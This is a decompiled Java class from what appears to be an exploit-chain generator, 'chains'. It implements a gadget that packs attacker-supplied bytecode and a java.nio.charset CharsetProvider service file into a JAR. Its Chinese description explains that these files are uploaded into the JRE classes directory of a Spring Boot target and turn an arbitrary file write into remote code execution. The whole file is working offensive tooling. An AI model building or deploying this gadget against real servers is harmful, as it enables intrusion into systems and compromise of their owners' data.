package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import java.io.ByteArrayOutputStream;
import java.util.jar.JarEntry;
import java.util.jar.JarOutputStream;

@GadgetAnnotation(name = "charsets利用姿势2-字节码", description = "适用于 SpringBoot 环境下写字节码文件以及SPI service文件进行 RCE\n需要将上述两个文件上传至: /usr/lib/jvm/java-1.8-openjdk/jre/classes/ 目录下, 并且需要创建对应文件夹\n此Gadget生成的是一个jar包, 需要自行解压获取里面的 class字节码文件和 META-INF/services/java.nio.charset.spi.CharsetProvider 文件, 然后进行上传\nReference: https://threedr3am.github.io/2021/04/14/JDK8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%9C%BA%E6%99%AF%E4%B8%8B%E7%9A%84SpringBoot%20RCE/\n", dependencies = {"springboot"}, authors = {Authors.Threedr3am}, priority = 30)
@GadgetTags(tags = {Tag.CharsetJAR, Tag.Other}, nextTags = {Tag.BytecodeConvertTag})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/CharsetJarConvert2.class */
public class CharsetJarConvert2 implements Gadget {
    public byte[] getObject(byte[] bArr, String str) throws Exception {
        return createCharsetJar(bArr, str);
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.put(ContextTag.CHARSET_WRAPPER_KEY, true);
        return getObject((byte[]) gadgetChain.doCreate(gadgetContext), gadgetContext.getString(ContextTag.CLASS_NAME_KEY));
    }

    public static byte[] createCharsetJar(byte[] bArr, String str) throws Exception {
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        JarOutputStream jarOutputStream = new JarOutputStream(byteArrayOutputStream);
        Throwable th = null;
        try {
            try {
                jarOutputStream.putNextEntry(new JarEntry(str.replace(".", "/") + ".class"));
                jarOutputStream.write(bArr);
                jarOutputStream.closeEntry();
                jarOutputStream.putNextEntry(new JarEntry("META-INF/services/java.nio.charset.spi.CharsetProvider"));
                jarOutputStream.write(str.getBytes());
                jarOutputStream.closeEntry();
                if (jarOutputStream != null) {
                    if (0 != 0) {
                        try {
                            jarOutputStream.close();
                        } catch (Throwable th2) {
                            th.addSuppressed(th2);
                        }
                    } else {
                        jarOutputStream.close();
                    }
                }
                return byteArrayOutputStream.toByteArray();
            } finally {
            }
        } catch (Throwable th3) {
            if (jarOutputStream != null) {
                if (th != null) {
                    try {
                        jarOutputStream.close();
                    } catch (Throwable th4) {
                        th.addSuppressed(th4);
                    }
                } else {
                    jarOutputStream.close();
                }
            }
            throw th3;
        }
    }
}
